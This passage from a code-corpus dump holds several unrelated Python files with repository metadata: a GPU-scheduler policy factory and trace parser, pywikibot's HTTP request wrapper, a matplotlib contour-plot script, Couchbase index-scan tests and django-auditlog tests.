elif policy_name == 'gandiva':
policy = gandiva.GandivaPolicy(seed=seed)
elif policy_name == 'isolated':
policy = isolated.IsolatedPolicy()
elif policy_name == 'max_min_fairness':
policy = max_min_fairness.MaxMinFairnessPolicy(solver=solver)
elif policy_name == 'max_min_fairness_perf':
policy = max_min_fairness.MaxMinFairnessPolicyWithPerf(solver=solver,
num_threads=num_threads)
elif policy_name == 'max_min_fairness_packed':
policy = \
max_min_fairness.MaxMinFairnessPolicyWithPacking(solver=solver,
num_threads=num_threads)
elif policy_name == 'max_min_fairness_water_filling':
policy = max_min_fairness_water_filling.MaxMinFairnessWaterFillingPolicy(
priority_reweighting_policies=priority_reweighting_policies)
elif policy_name == 'max_min_fairness_water_filling_perf':
policy = max_min_fairness_water_filling.MaxMinFairnessWaterFillingPolicyWithPerf(
priority_reweighting_policies=priority_reweighting_policies)
elif policy_name == 'max_min_fairness_water_filling_packed':
policy = max_min_fairness_water_filling.MaxMinFairnessWaterFillingPolicyWithPacking(
priority_reweighting_policies=priority_reweighting_policies)
elif policy_name == 'max_sum_throughput_perf':
policy = max_sum_throughput.ThroughputSumWithPerf(solver=solver,
num_threads=num_threads)
elif policy_name == 'max_sum_throughput_normalized_by_cost_perf':
policy = max_sum_throughput.ThroughputNormalizedByCostSumWithPerf(
solver=solver, num_threads=num_threads)
elif policy_name == 'max_sum_throughput_normalized_by_cost_perf_SLOs':
policy = max_sum_throughput.ThroughputNormalizedByCostSumWithPerfSLOs(
solver=solver, num_threads=num_threads)
elif policy_name == 'max_sum_throughput_normalized_by_cost_packed_SLOs':
policy = \
max_sum_throughput.ThroughputNormalizedByCostSumWithPackingSLOs(
solver=solver,
num_threads=num_threads)
elif policy_name == 'min_total_duration':
policy = min_total_duration.MinTotalDurationPolicy(solver=solver,
num_threads=num_threads)
elif policy_name == 'min_total_duration_perf':
policy = min_total_duration.MinTotalDurationPolicyWithPerf(solver=solver,
num_threads=num_threads)
elif policy_name == 'min_total_duration_packed':
policy = \
min_total_duration.MinTotalDurationPolicyWithPacking(solver=solver,
num_threads=num_threads)
else:
raise ValueError('Unknown policy!')
return policy
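# Hedged illustration (not in the original file): policy names map directly onto the policy
# classes above, e.g. get_policy('fifo', seed=42) returns a fifo.FIFOPolicy and
# get_policy('max_min_fairness_packed', solver=solver) returns the packing variant; an
# unknown name raises ValueError('Unknown policy!').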
def parse_trace(trace_file):
jobs = []
arrival_times = []
with open(trace_file, 'r') as f:
for line in f:
(job_type, command, working_directory, num_steps_arg,
needs_data_dir, total_steps, scale_factor, priority_weight, SLO,
arrival_time) = line.split('\t')
assert(int(scale_factor) >= 1)
jobs.append(Job(job_id=None,
job_type=job_type,
command=command,
working_directory=working_directory,
needs_data_dir=bool(int(needs_data_dir)),
num_steps_arg=num_steps_arg,
total_steps=int(total_steps),
duration=None,
scale_factor=int(scale_factor),
priority_weight=float(priority_weight),
SLO=float(SLO)))
arrival_times.append(float(arrival_time))
return jobs, arrival_times
def print_allocation(allocation, current_time=None):
"""Prints the allocation.
Debug method used for printing the allocation of each job on each
worker type.
"""
print('=' * 80)
if current_time is not None:
print('Allocation\t(Current_time: %f)' % (current_time))
print('-' * 80)
for job_id in sorted(list(allocation.keys())):
allocation_str = 'Job ID %s:' % (job_id)
for worker_type in sorted(list(allocation[job_id].keys())):
value = allocation[job_id][worker_type]
allocation_str += ' [%s: %f]' % (worker_type, value)
print(allocation_str)
print('=' * 80)
| 41.378182 | 97 | 0.610994 |
6c6f72a68abcba50195a52f81db48437b09bf58a | 5,541 | py | Python | pywikibot/comms/threadedhttp.py | valhallasw/pywikibot-core | 32a8c3c1298a5cb077381fe202daefde82c1c5d3 | [
"MIT"
] | null | null | null | pywikibot/comms/threadedhttp.py | valhallasw/pywikibot-core | 32a8c3c1298a5cb077381fe202daefde82c1c5d3 | [
"MIT"
] | null | null | null | pywikibot/comms/threadedhttp.py | valhallasw/pywikibot-core | 32a8c3c1298a5cb077381fe202daefde82c1c5d3 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
"""Http backend layer, formerly providing a httplib2 wrapper."""
from __future__ import unicode_literals
# (C) Pywikibot team, 2007-2015
__version__ = '$Id: 6c6f72a68abcba50195a52f81db48437b09bf58a $'
__docformat__ = 'epytext'
# standard python libraries
import codecs
import sys
if sys.version_info[0] > 2:
from urllib.parse import urlparse
else:
from urlparse import urlparse
import pywikibot
from pywikibot.tools import UnicodeMixin
_logger = "comm.threadedhttp"
class HttpRequest(UnicodeMixin):
"""Object wrapper for HTTP requests that need to block origin thread.
self.data will be either:
* a tuple of (dict, unicode) if the request was successful
* an exception
"""
def __init__(self, uri, method="GET", body=None, headers=None,
callbacks=None, charset=None, **kwargs):
"""
Constructor.
See C{Http.request} for parameters.
"""
self.uri = uri
self.method = method
self.body = body
self.headers = headers
if isinstance(charset, codecs.CodecInfo):
self.charset = charset.name
elif charset:
self.charset = charset
elif headers and 'accept-charset' in headers:
self.charset = headers['accept-charset']
else:
self.charset = None
self.callbacks = callbacks
self.args = [uri, method, body, headers]
self.kwargs = kwargs
self._parsed_uri = None
self._data = None
@property
def data(self):
"""Return the requests response tuple."""
assert(self._data is not None)
return self._data
@data.setter
def data(self, value):
"""Set the requests response and invoke each callback."""
self._data = value
if self.callbacks:
for callback in self.callbacks:
callback(self)
@property
def exception(self):
"""Get the exception, if any."""
if isinstance(self.data, Exception):
return self.data
@property
def response_headers(self):
"""Return the response headers."""
if not self.exception:
return self.data.headers
@property
def raw(self):
"""Return the raw response body."""
if not self.exception:
return self.data.content
@property
def parsed_uri(self):
"""Return the parsed requested uri."""
if not self._parsed_uri:
self._parsed_uri = urlparse(self.uri)
return self._parsed_uri
@property
def hostname(self):
"""Return the host of the request."""
return self.parsed_uri.netloc
@property
def status(self):
"""HTTP response status.
@rtype: int
"""
if not self.exception:
return self.data.status_code
@property
def header_encoding(self):
"""Return charset given by the response header."""
if not hasattr(self, '_header_encoding'):
pos = self.response_headers['content-type'].find('charset=')
if pos >= 0:
pos += len('charset=')
encoding = self.response_headers['content-type'][pos:]
self._header_encoding = encoding
else:
self._header_encoding = None
return self._header_encoding
@property
def encoding(self):
"""Detect the response encoding."""
if not hasattr(self, '_encoding'):
if not self.charset and not self.header_encoding:
pywikibot.log(u"Http response doesn't contain a charset.")
charset = 'latin1'
else:
charset = self.charset
if (self.header_encoding and codecs.lookup(self.header_encoding) !=
(codecs.lookup(charset) if charset else None)):
if charset:
pywikibot.warning(
'Encoding "{0}" requested but "{1}" '
'received in the header.'.format(
charset, self.header_encoding))
try:
# TODO: Buffer decoded content, weakref does remove it too
# early (directly after this method)
self.raw.decode(self.header_encoding)
except UnicodeError as e:
self._encoding = e
else:
self._encoding = self.header_encoding
else:
self._encoding = None
if charset and (isinstance(self._encoding, Exception) or
not self._encoding):
try:
self.raw.decode(charset)
except UnicodeError as e:
self._encoding = e
else:
self._encoding = charset
if isinstance(self._encoding, Exception):
raise self._encoding
return self._encoding
def decode(self, encoding, errors='strict'):
"""Return the decoded response."""
return self.raw.decode(encoding, errors)
@property
def content(self):
"""Return the response decoded by the detected encoding."""
return self.decode(self.encoding)
def __unicode__(self):
"""Return the response decoded by the detected encoding."""
return self.content
def __bytes__(self):
"""Return the undecoded response."""
return self.raw
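# --- Hedged usage sketch (not part of the original module) ---
# The request object is filled in by whichever thread performs the HTTP call: assigning a
# requests response (or an exception) to `.data` fires the registered callbacks, after which
# the convenience properties become usable, e.g.
#   req = HttpRequest('https://example.org', charset='utf-8',
#                     callbacks=[lambda r: print(r.status)])
#   req.data = response_from_requests   # placeholder response object; invokes the callback
#   text = req.content                  # body decoded with the detected encoding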
| 29.951351 | 79 | 0.571016 |
a6929c9d4a47ecf5f13127f442f4eba791ce3748 | 1,249 | py | Python | utils/create_contour_plots.py | sho-87/python-machine-learning | 439556ad5faf549acb8e3923bfed7814fcb1a8ac | [
"MIT"
] | 3 | 2016-11-25T20:34:23.000Z | 2019-09-25T08:03:54.000Z | utils/create_contour_plots.py | sho-87/python-machine-learning | 439556ad5faf549acb8e3923bfed7814fcb1a8ac | [
"MIT"
] | null | null | null | utils/create_contour_plots.py | sho-87/python-machine-learning | 439556ad5faf549acb8e3923bfed7814fcb1a8ac | [
"MIT"
] | 4 | 2017-09-26T01:48:32.000Z | 2019-08-09T22:08:01.000Z | import numpy as np
import matplotlib.pyplot as plt
f, (ax1, ax2) = plt.subplots(1, 2, sharey=False,figsize=(8,4))
# Subplot 1 (left)
xlist = np.linspace(-4.0, 4.0, 100)
ylist = np.linspace(-2.0, 2.0, 100)
X, Y = np.meshgrid(xlist, ylist)
Z = np.sqrt(X ** 2 + Y ** 2 )
levels = [0.0, 0.2, 0.5, 0.9, 1.5, 2.5, 3.5]
contour1 = ax1.contour(X, Y, Z, levels)
# Create legend items
lines = []
for i in range(len(levels)):
lines.append(contour1.collections[i])
# Subplot 2 (right)
xlist = np.linspace(-4.0, 4.0, 100)
ylist = np.linspace(-4, 4, 100)
X, Y = np.meshgrid(xlist, ylist)
Z = np.sqrt(X ** 2 + Y ** 2 )
levels = [0.0, 0.2, 0.5, 0.9, 1.5, 2.5, 3.5]
contour2 = ax2.contour(X, Y, Z, levels)
# set titles
f.suptitle('Contour Plots', fontweight="bold", size=14)
ax1.set_title('Raw', fontweight="bold")
ax2.set_title('Standardized', fontweight="bold")
ax1.grid(True)
ax1.set_xticklabels([])
ax1.set_yticklabels([])
ax1.set_xlabel('Feature 2')
ax1.set_ylabel('Feature 1')
ax2.grid(True)
ax2.set_xticklabels([])
ax2.set_yticklabels([])
ax2.set_xlabel('Feature 2')
ax2.set_ylabel('Feature 1')
# Adjust layout
plt.figlegend(lines, levels, title='Loss', loc="center left", bbox_to_anchor=(0,0.64))
plt.tight_layout()
plt.subplots_adjust(top=0.86)
| 26.020833 | 86 | 0.668535 |
cf41f89ede692069a30d526e22b4f2cb270ebfbc | 21,994 | py | Python | pytests/gsi/indexscans_gsi.py | couchbaselabs/testrunner-bharath | 96af90070da2140cc11c549db7403f5ea3b76d34 | [
"Apache-2.0"
] | null | null | null | pytests/gsi/indexscans_gsi.py | couchbaselabs/testrunner-bharath | 96af90070da2140cc11c549db7403f5ea3b76d34 | [
"Apache-2.0"
] | null | null | null | pytests/gsi/indexscans_gsi.py | couchbaselabs/testrunner-bharath | 96af90070da2140cc11c549db7403f5ea3b76d34 | [
"Apache-2.0"
] | null | null | null | from .base_gsi import BaseSecondaryIndexingTests
import copy
from couchbase_helper.query_definitions import QueryDefinition
from couchbase_helper.query_definitions import SQLDefinitionGenerator
from couchbase_helper.tuq_generators import TuqGenerators
QUERY_TEMPLATE = "SELECT {0} FROM %s "
class SecondaryIndexingScanTests(BaseSecondaryIndexingTests):
def setUp(self):
super(SecondaryIndexingScanTests, self).setUp()
def tearDown(self):
super(SecondaryIndexingScanTests, self).tearDown()
def suite_setUp(self):
pass
def suite_tearDown(self):
pass
def test_create_query_explain_drop_index(self):
self.use_primary_index= self.input.param("use_primary_index", False)
self.indexes= self.input.param("indexes", "").split(":")
self.emitFields= self.input.param("emitFields", "*").split(":")
self.whereCondition= self.input.param("whereCondition", None)
self.emitFields = ",".join(self.emitFields)
query_template = QUERY_TEMPLATE
query_template = query_template.format(self.emitFields)
self.index_name = "test_create_query_explain_drop_index"
        run_create_index = True
        run_drop_index = True
if self.use_primary_index:
run_create_index = False
run_drop_index = False
self.index_name = "primary"
if self.whereCondition:
query_template += " WHERE {0}".format(self.whereCondition)
query_template = self._translate_where_clause(query_template)
query_definition = QueryDefinition(index_name=self.index_name, index_fields=self.indexes,
query_template=query_template, groups=[])
self.run_multi_operations(
buckets = self.buckets,
query_definitions = [query_definition],
create_index = run_create_index, drop_index = run_drop_index,
query_with_explain = self.run_query_with_explain, query = self.run_query)
def test_multi_create_query_explain_drop_index(self):
try:
self._create_index_in_async()
self.run_doc_ops()
self._query_explain_in_async()
self._verify_index_map()
except Exception as ex:
self.log.info(ex)
raise
finally:
tasks = self.async_run_multi_operations(buckets=self.buckets, query_definitions=self.query_definitions,
drop_index=True)
self._run_tasks(tasks)
def test_multi_create_query_explain_drop_index_with_concurrent_mutations(self):
try:
kvops_tasks = self.async_run_doc_ops()
self._create_index_in_async()
# runs operations
self._run_tasks(kvops_tasks)
self._query_explain_in_async()
except Exception as ex:
self.log.info(ex)
raise
finally:
tasks = self.async_run_multi_operations(buckets=self.buckets, query_definitions=self.query_definitions,
create_index=False,
drop_index=True,
query_with_explain=False, query=False,
scan_consistency=self.scan_consistency)
self._run_tasks(tasks)
def test_concurrent_mutations_index_create_query_drop(self):
self.query_definitions_create_candidates =[]
self.query_definitions_query_candidates =[]
scan_vector_ranges = []
scan_vectors = None
if self.scan_vector_per_values:
scan_vector_ranges = self._generate_scan_vector_ranges(self.scan_vector_per_values)
if len(scan_vector_ranges) > 0:
for use_percentage in scan_vector_ranges:
scan_vectors = self.gen_scan_vector(use_percentage=use_percentage,
use_random=self.random_scan_vector)
try:
self.query_definitions_drop_candidates = copy.deepcopy(self.query_definitions)
self.query_definitions_create_candidates = copy.deepcopy(self.query_definitions)
self.query_definitions_query_candidates = copy.deepcopy(self.query_definitions)
i =0
for query_definition in self.query_definitions_drop_candidates:
query_definition.index_name += str(i)+"_drop_candidates"
i+=1
for query_definition in self.query_definitions_create_candidates:
query_definition.index_name += str(i)+"_create_candidates"
i+=1
for query_definition in self.query_definitions_query_candidates:
query_definition.index_name += str(i)+"_query_candidates"
i+=1
# Start Mutations
kvops_tasks = self.async_run_doc_ops()
# Initialize indexes
self._create_index_in_async(query_definitions = self.query_definitions_drop_candidates)
self._create_index_in_async(query_definitions = self.query_definitions_query_candidates)
self.log.info("<<<<< Run Query Tasks >>>>>>")
query_tasks = self.async_run_multi_operations(buckets = self.buckets,
query_definitions=self.query_definitions_query_candidates,
create_index=False, drop_index=False,
query_with_explain=False, query=True, scan_consistency=self.scan_consistency,
scan_vectors=scan_vectors)
self.log.info("<<<<< Run Drop Tasks >>>>>>")
drop_tasks = self.async_run_multi_operations(buckets = self.buckets,
query_definitions = self.query_definitions_drop_candidates,
create_index = False, drop_index = True,
query_with_explain = False, query = False, scan_consistency = self.scan_consistency)
self._create_index_in_async(query_definitions = self.query_definitions_create_candidates)
# runs operations
self._run_tasks(kvops_tasks)
self._run_tasks(query_tasks)
self._run_tasks(drop_tasks)
except Exception as ex:
self.log.info(ex)
if not scan_vectors:
msg = "No scan_vector value"
if msg not in str(ex):
raise
else:
raise
finally:
tasks = self.async_run_multi_operations(buckets = self.buckets,
query_definitions = self.query_definitions_create_candidates,
create_index = False, drop_index=True,
query_with_explain = False, query = False, scan_consistency = self.scan_consistency)
self._run_tasks(tasks)
tasks = self.async_run_multi_operations(buckets = self.buckets,
query_definitions = self.query_definitions_query_candidates,
create_index = False, drop_index=True,
query_with_explain = False, query = False, scan_consistency = self.scan_consistency)
self._run_tasks(tasks)
def test_multi_create_query_explain_drop_index_primary(self):
qdfs = []
for query_definition in self.query_definitions:
query_definition.index_name = "#primary"
qdfs.append(query_definition)
self.query_definitions = qdfs
self.sleep(15)
try:
self._verify_primary_index_count()
self.run_doc_ops()
self._verify_primary_index_count()
self._query_explain_in_async()
except Exception as ex:
self.log.info(ex)
raise
def test_multi_create_query_explain_drop_index_with_index_where_clause(self):
query_definition_generator = SQLDefinitionGenerator()
self.query_definitions = query_definition_generator.generate_employee_data_query_definitions_for_index_where_clause()
self.use_where_clause_in_index = True
self.query_definitions = query_definition_generator.filter_by_group(self.groups, self.query_definitions)
self.test_multi_create_query_explain_drop_index()
def test_multi_create_query_explain_drop_index_with_index_expressions(self):
query_definition_generator = SQLDefinitionGenerator()
self.query_definitions = query_definition_generator.generate_employee_data_query_definitions_for_index_expressions()
self.query_definitions = query_definition_generator.filter_by_group(self.groups, self.query_definitions)
self.test_multi_create_query_explain_drop_index()
def test_multi_create_query_explain_drop_index_with_index_expressions_and_where_clause(self):
self.use_where_clause_in_index = True
self.test_multi_create_query_explain_drop_index_with_index_expressions()
def test_multi_create_query_explain_drop_index_scan_consistency_with_index_expressions(self):
query_definition_generator = SQLDefinitionGenerator()
self.query_definitions = query_definition_generator.generate_employee_data_query_definitions_for_index_expressions()
self.query_definitions = query_definition_generator.filter_by_group(self.groups, self.query_definitions)
self.test_multi_create_query_explain_drop_index_scan_consistency()
def test_multi_create_query_explain_drop_index_scan_consistency_with_where_clause(self):
query_definition_generator = SQLDefinitionGenerator()
self.query_definitions = query_definition_generator.generate_employee_data_query_definitions_for_index_where_clause()
self.use_where_clause_in_index = True
self.query_definitions = query_definition_generator.filter_by_group(self.groups, self.query_definitions)
self.test_multi_create_query_explain_drop_index_scan_consistency()
def test_multi_create_query_explain_drop_index_scan_consistency(self):
self.random_scan_vector= self.input.param("random_scan_vector", False)
scan_vector_ranges = []
scan_vectors = None
if self.scan_vector_per_values:
scan_vector_ranges = self._generate_scan_vector_ranges(self.scan_vector_per_values)
try:
self._create_index_in_async()
if len(scan_vector_ranges) > 0:
for use_percentage in scan_vector_ranges:
scan_vectors = self.gen_scan_vector(use_percentage = use_percentage,
use_random = self.random_scan_vector)
tasks = self.async_run_multi_operations(buckets = self.buckets,
query_definitions = self.query_definitions,
create_index = False, drop_index = False,
query_with_explain = False, query = self.run_query,
scan_consistency = self.scan_consistency,
scan_vectors = scan_vectors)
self._run_tasks(tasks)
else:
tasks = self.async_run_multi_operations(buckets = self.buckets,
query_definitions = self.query_definitions,
create_index = False, drop_index = False,
query_with_explain = False, query = self.run_query,
scan_consistency = self.scan_consistency,
scan_vectors = scan_vectors)
self._run_tasks(tasks)
tasks = self.async_run_multi_operations(buckets = self.buckets,
query_definitions = self.query_definitions,
create_index = False, drop_index = False,
query_with_explain = self.run_query_with_explain, query = False)
self._run_tasks(tasks)
# runs operations
self.run_doc_ops()
if self.scan_vector_per_values:
scan_vector_ranges = self._generate_scan_vector_ranges(self.scan_vector_per_values)
# verify results
tasks = self.async_run_multi_operations(buckets = self.buckets,
query_definitions = self.query_definitions,
create_index = False, drop_index = False,
query_with_explain = self.run_query_with_explain, query = False)
self._run_tasks(tasks)
if len(scan_vector_ranges) > 0:
for use_percentage in scan_vector_ranges:
scan_vectors = self.gen_scan_vector(use_percentage = use_percentage,
use_random = self.random_scan_vector)
tasks = self.async_run_multi_operations(buckets = self.buckets,
query_definitions = self.query_definitions,
create_index = False, drop_index = False,
query_with_explain = False, query = self.run_query,
scan_consistency = self.scan_consistency,
scan_vectors = scan_vectors)
self._run_tasks(tasks)
else:
tasks = self.async_run_multi_operations(buckets = self.buckets,
query_definitions = self.query_definitions,
create_index = False, drop_index = False,
query_with_explain = False, query = self.run_query,
scan_consistency = self.scan_consistency,
scan_vectors = scan_vectors)
self._run_tasks(tasks)
except Exception as ex:
self.log.info(ex)
if self.scan_consistency == "at_plus" and not scan_vectors:
msg = "No scan_vector value"
if msg not in str(ex):
raise
else:
raise
finally:
tasks = self.async_run_multi_operations(buckets = self.buckets,
query_definitions = self.query_definitions,
create_index = False, drop_index=True,
query_with_explain = False, query = False)
self._run_tasks(tasks)
def test_primary_query_scan_consistency(self):
self.random_scan_vector= self.input.param("random_scan_vector", False)
scan_vector_ranges = []
scan_vectors = None
if self.scan_vector_per_values:
scan_vector_ranges = self._generate_scan_vector_ranges(self.scan_vector_per_values)
try:
if len(scan_vector_ranges) > 0:
for use_percentage in scan_vector_ranges:
scan_vectors = self.gen_scan_vector(use_percentage = use_percentage,
use_random = self.random_scan_vector)
tasks = self.async_run_multi_operations(buckets = self.buckets,
query_definitions = self.query_definitions,
create_index = False, drop_index = False,
query_with_explain = False, query = self.run_query,
scan_consistency = self.scan_consistency,
scan_vectors = scan_vectors)
self._run_tasks(tasks)
else:
tasks = self.async_run_multi_operations(buckets = self.buckets,
query_definitions = self.query_definitions,
create_index = False, drop_index = False,
query_with_explain = False, query = self.run_query,
scan_consistency = self.scan_consistency,
scan_vectors = scan_vectors)
self._run_tasks(tasks)
            # run the document operations
self.run_doc_ops()
if self.scan_vector_per_values:
scan_vector_ranges = self._generate_scan_vector_ranges(self.scan_vector_per_values)
self._verify_primary_index_count()
# verify results
if len(scan_vector_ranges) > 0:
for use_percentage in scan_vector_ranges:
scan_vectors = self.gen_scan_vector(use_percentage = use_percentage,
use_random = self.random_scan_vector)
tasks = self.async_run_multi_operations(buckets = self.buckets,
query_definitions = self.query_definitions,
create_index = False, drop_index = False,
query_with_explain = False, query = self.run_query,
scan_consistency = self.scan_consistency,
scan_vectors = scan_vectors)
self._run_tasks(tasks)
else:
tasks = self.async_run_multi_operations(buckets = self.buckets,
query_definitions = self.query_definitions,
create_index = False, drop_index = False,
query_with_explain = False, query = self.run_query,
scan_consistency = self.scan_consistency,
scan_vectors = scan_vectors)
self._run_tasks(tasks)
except Exception as ex:
self.log.info(ex)
if self.scan_consistency == "at_plus" and not scan_vectors:
msg = "No scan_vector value"
if msg not in str(ex):
raise
else:
raise
def test_failure_query_with_non_existing_primary_index(self):
self.indexes= self.input.param("indexes", "").split(":")
self.emitFields= self.input.param("emitFields", "*").split(":")
self.whereCondition= self.input.param("whereCondition", None)
self.emitFields = ",".join(self.emitFields)
query_template = QUERY_TEMPLATE
query_template = query_template.format(self.emitFields)
self.index_name = "test_failure_query_with_non_existing_primary_index"
if self.whereCondition:
query_template += " WHERE {0}".format(self.whereCondition)
query_template = self._translate_where_clause(query_template)
query_definition = QueryDefinition(index_name=self.index_name, index_fields=self.indexes,
query_template=query_template, groups=[])
try:
self.run_multi_operations(
buckets = self.buckets,
query_definitions = [query_definition],
create_index = False, drop_index = False,
query_with_explain = False, query = self.run_query)
self.fail(" querying without indexes and primary indexes is not allowed")
except Exception as ex:
msg = "No primary index on keyspace default. Use CREATE PRIMARY INDEX to create one."
self.assertTrue(msg in str(ex), "did not receive message as expected : {0}".format(ex))
def _generate_scan_vector_ranges(self, scan_vector_per_values = None):
scan_vector_per_values = str(scan_vector_per_values)
values = scan_vector_per_values.split(":")
new_values = []
for val in values:
new_values.append(float(val))
return new_values
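    # For illustration (hypothetical input, not taken from this suite): with
    # scan_vector_per_values = "0.2:0.5:1", the split/float conversion above
    # yields [0.2, 0.5, 1.0], i.e. one scan-vector percentage per query run.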
def _run_tasks(self, tasks):
for task in tasks:
task.result()
def _translate_where_clause(self, query):
query = query.replace("EQUALS", "==")
query = query.replace("NOT_EQUALS", "!=")
query = query.replace("LESS_THAN", "<")
query = query.replace("LESS_THAN_EQUALS", "<=")
query = query.replace("GREATER_THAN", ">")
query = query.replace("GREATER_THAN_EQUALS", ">=")
return query
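    # Example of the translation above, assuming a hypothetical template such as
    # 'SELECT * FROM default WHERE age GREATER_THAN 30 AND name EQUALS "Ann"':
    # the replacements produce
    # 'SELECT * FROM default WHERE age > 30 AND name == "Ann"'.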
def _create_index_in_async(self, query_definitions = None, buckets = None, index_nodes = None):
refer_index = []
        if buckets is None:
            buckets = self.buckets
        if query_definitions is None:
            query_definitions = self.query_definitions
if not self.run_async:
self.run_multi_operations(buckets=buckets, query_definitions=query_definitions, create_index=True)
return
        if index_nodes is None:
index_nodes = self.get_nodes_from_services_map(service_type="index", get_all_nodes=True)
x = len(query_definitions) - 1
while x > -1:
tasks = []
build_index_map = {}
for bucket in buckets:
build_index_map[bucket.name] = []
for server in index_nodes:
for bucket in buckets:
if (x > -1):
key = "{0}:{1}".format(bucket.name, query_definitions[x].index_name)
if (key not in refer_index):
refer_index.append(key)
refer_index.append(query_definitions[x].index_name)
deploy_node_info = None
if self.use_gsi_for_secondary:
deploy_node_info = ["{0}:{1}".format(server.ip, server.port)]
build_index_map[bucket.name].append(query_definitions[x].index_name)
tasks.append(self.async_create_index(bucket.name, query_definitions[x],
deploy_node_info=deploy_node_info))
x -= 1
for task in tasks:
task.result()
if self.defer_build:
for bucket_name in list(build_index_map.keys()):
if len(build_index_map[bucket_name]) > 0:
build_index_task = self.async_build_index(bucket_name, build_index_map[bucket_name])
build_index_task.result()
monitor_index_tasks = []
for bucket_name in list(build_index_map.keys()):
for index_name in build_index_map[bucket_name]:
monitor_index_tasks.append(self.async_monitor_index(bucket_name, index_name))
for task in monitor_index_tasks:
task.result()
| 52.743405 | 125 | 0.622352 |
3b2bb4c51c1c8a2f00ce76586497e59d4dae802b | 30,853 | py | Python | src/auditlog_tests/tests.py | darwin-homes/django-auditlog | 4ee900bb9b2892618b976fa427da0ab215aa012e | [
"MIT"
] | null | null | null | src/auditlog_tests/tests.py | darwin-homes/django-auditlog | 4ee900bb9b2892618b976fa427da0ab215aa012e | [
"MIT"
] | null | null | null | src/auditlog_tests/tests.py | darwin-homes/django-auditlog | 4ee900bb9b2892618b976fa427da0ab215aa012e | [
"MIT"
] | null | null | null | import datetime
import django
from django.conf import settings
from django.contrib import auth
from django.contrib.auth.models import User, AnonymousUser
from django.core.exceptions import ValidationError
from django.db.models.signals import pre_save
from django.http import HttpResponse
from django.test import TestCase, RequestFactory
from django.utils import dateformat, formats, timezone
from dateutil.tz import gettz
from auditlog.middleware import AuditlogMiddleware
from auditlog.models import LogEntry
from auditlog.registry import auditlog
from auditlog_tests.models import SimpleModel, AltPrimaryKeyModel, UUIDPrimaryKeyModel, \
ProxyModel, SimpleIncludeModel, SimpleExcludeModel, SimpleMappingModel, RelatedModel, \
ManyRelatedModel, AdditionalDataIncludedModel, DateTimeFieldModel, ChoicesFieldModel, \
CharfieldTextfieldModel, PostgresArrayFieldModel, NoDeleteHistoryModel, AdditionalDataIncludedWithKwargsModel
from auditlog import compat
class SimpleModelTest(TestCase):
def setUp(self):
self.obj = SimpleModel.objects.create(text='I am not difficult.')
def test_create(self):
"""Creation is logged correctly."""
# Get the object to work with
obj = self.obj
# Check for log entries
self.assertTrue(obj.history.count() == 1, msg="There is one log entry")
try:
history = obj.history.get()
except obj.history.DoesNotExist:
self.assertTrue(False, "Log entry exists")
else:
self.assertEqual(history.action, LogEntry.Action.CREATE, msg="Action is 'CREATE'")
self.assertEqual(history.object_repr, str(obj), msg="Representation is equal")
def test_update(self):
"""Updates are logged correctly."""
# Get the object to work with
obj = self.obj
# Change something
obj.boolean = True
obj.save()
# Check for log entries
self.assertTrue(obj.history.filter(action=LogEntry.Action.UPDATE).count() == 1, msg="There is one log entry for 'UPDATE'")
history = obj.history.get(action=LogEntry.Action.UPDATE)
self.assertJSONEqual(history.changes, '{"boolean": ["False", "True"]}', msg="The change is correctly logged")
def test_delete(self):
"""Deletion is logged correctly."""
# Get the object to work with
obj = self.obj
history = obj.history.latest()
# Delete the object
obj.delete()
# Check for log entries
self.assertTrue(LogEntry.objects.filter(content_type=history.content_type, object_pk=history.object_pk, action=LogEntry.Action.DELETE).count() == 1, msg="There is one log entry for 'DELETE'")
def test_recreate(self):
SimpleModel.objects.all().delete()
self.setUp()
self.test_create()
class AltPrimaryKeyModelTest(SimpleModelTest):
def setUp(self):
self.obj = AltPrimaryKeyModel.objects.create(key=str(datetime.datetime.now()), text='I am strange.')
class UUIDPrimaryKeyModelModelTest(SimpleModelTest):
def setUp(self):
self.obj = UUIDPrimaryKeyModel.objects.create(text='I am strange.')
def test_get_for_object(self):
self.obj.boolean = True
self.obj.save()
self.assertEqual(LogEntry.objects.get_for_object(self.obj).count(), 2)
def test_get_for_objects(self):
self.obj.boolean = True
self.obj.save()
self.assertEqual(LogEntry.objects.get_for_objects(UUIDPrimaryKeyModel.objects.all()).count(), 2)
class ProxyModelTest(SimpleModelTest):
def setUp(self):
self.obj = ProxyModel.objects.create(text='I am not what you think.')
class ManyRelatedModelTest(TestCase):
"""
Test the behaviour of a many-to-many relationship.
"""
def setUp(self):
self.obj = ManyRelatedModel.objects.create()
self.rel_obj = ManyRelatedModel.objects.create()
self.obj.related.add(self.rel_obj)
def test_related(self):
self.assertEqual(LogEntry.objects.get_for_objects(self.obj.related.all()).count(), self.rel_obj.history.count())
self.assertEqual(LogEntry.objects.get_for_objects(self.obj.related.all()).first(), self.rel_obj.history.first())
class MiddlewareTest(TestCase):
"""
Test the middleware responsible for connecting and disconnecting the signals used in automatic logging.
"""
def setUp(self):
self.middleware = AuditlogMiddleware()
self.factory = RequestFactory()
self.user = User.objects.create_user(username='test', email='test@example.com', password='top_secret')
def test_request_anonymous(self):
"""No actor will be logged when a user is not logged in."""
# Create a request
request = self.factory.get('/')
request.user = AnonymousUser()
# Run middleware
self.middleware.process_request(request)
# Validate result
self.assertFalse(pre_save.has_listeners(LogEntry))
# Finalize transaction
self.middleware.process_exception(request, None)
def test_request(self):
"""The actor will be logged when a user is logged in."""
# Create a request
request = self.factory.get('/')
request.user = self.user
# Run middleware
self.middleware.process_request(request)
# Validate result
self.assertTrue(pre_save.has_listeners(LogEntry))
# Finalize transaction
self.middleware.process_exception(request, None)
def test_response(self):
"""The signal will be disconnected when the request is processed."""
# Create a request
request = self.factory.get('/')
request.user = self.user
# Run middleware
self.middleware.process_request(request)
self.assertTrue(pre_save.has_listeners(LogEntry)) # The signal should be present before trying to disconnect it.
self.middleware.process_response(request, HttpResponse())
# Validate result
self.assertFalse(pre_save.has_listeners(LogEntry))
def test_exception(self):
"""The signal will be disconnected when an exception is raised."""
# Create a request
request = self.factory.get('/')
request.user = self.user
# Run middleware
self.middleware.process_request(request)
self.assertTrue(pre_save.has_listeners(LogEntry)) # The signal should be present before trying to disconnect it.
self.middleware.process_exception(request, ValidationError("Test"))
# Validate result
self.assertFalse(pre_save.has_listeners(LogEntry))
class SimpleIncludeModelTest(TestCase):
"""Log only changes in include_fields"""
def test_register_include_fields(self):
sim = SimpleIncludeModel(label='Include model', text='Looong text')
sim.save()
self.assertTrue(sim.history.count() == 1, msg="There is one log entry")
# Change label, record
sim.label = 'Changed label'
sim.save()
self.assertTrue(sim.history.count() == 2, msg="There are two log entries")
